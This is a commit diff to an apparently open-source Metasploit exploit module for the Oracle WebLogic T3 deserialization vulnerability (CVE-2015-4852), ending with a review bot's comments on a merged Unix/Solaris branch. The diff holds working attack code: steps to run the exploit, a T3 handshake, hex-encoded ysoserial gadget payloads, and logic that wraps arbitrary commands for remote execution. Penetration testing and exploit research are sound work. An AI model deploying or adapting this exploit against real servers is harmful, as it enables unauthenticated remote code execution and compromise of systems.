Improvements on code quality and documentation

master
Andres Rodriguez 2018-12-16 12:47:52 -08:00
parent 8ce7643e41
commit 48df4be54e
2 changed files with 16 additions and 11 deletions


@ -1,13 +1,16 @@
## Description
Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
## Vulnerable Application
Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0.
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/misc/weblogic_deserialize_rawobject`
3. `set rhosts <rhost>`
4. `set rport <srvport>`
5. `exploit`
## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
```


@ -65,11 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 7001
},
'DisclosureDate' => 'Jan 28 2015'))
register_options([Opt::RPORT(7001)])
end
def check
@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def t3_handshake
# retrieved from network traffic
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
@ -119,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
def build_t3_request_object
# T3 request serialized data
# retrieved by watching network traffic
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
data << '700000000a000000030000000000000006007070707070700000000a00000003'
@ -180,18 +180,16 @@ class MetasploitModule < Msf::Exploit::Remote
if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
elsif target.name == 'Unix'
elsif target.name == 'Unix' || target.name == 'Solaris'
nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
elsif target.name == 'Solaris'
sol_cmd = payload.encoded
mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
end
# serializing manually the payload string
serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
serialized_cmd << mycmd
# basic weblogic ClassTableEntry object (serialized)
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
@ -207,7 +205,9 @@ class MetasploitModule < Msf::Exploit::Remote
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
# new payload
# payload generated from ysoserial:
# java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
# the command (calc.exe) is patched in runtime with the payload
payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
@ -255,8 +255,9 @@ class MetasploitModule < Msf::Exploit::Remote
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
# serialized end
# end of payload object
# basic weblogic ImmutableServiceContext object (serialized)
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
@ -266,6 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
# sets the length of the stream
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
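Review bot: In the merged `elsif target.name == 'Unix' || target.name == 'Solaris'` branch, `nix_cmd.prepend('/bin/sh -c ')` mutates the String object returned by `payload.encoded` in place rather than building a new one, so if that accessor hands back a cached buffer the prefix is written into the cached object; building a fresh string avoids that: `nix_cmd = "/bin/sh -c #{payload.encoded}"`. The commit title describes code-quality work, but folding the former Solaris branch (which used `payload.encoded` unwrapped) into the Unix path is a behaviour change for that target, and a short comment above the branch should say so, e.g. `# Solaris now shares the Unix path and gets the /bin/sh -c wrapper`. With the Solaris branch gone there is still no `else`, so a target matching none of the names leaves `mycmd` nil and the following `mycmd.length` raises NoMethodError rather than a clear `fail_with`. The enclosing method starts before this hunk and continues past it, so the remaining branches are not visible here.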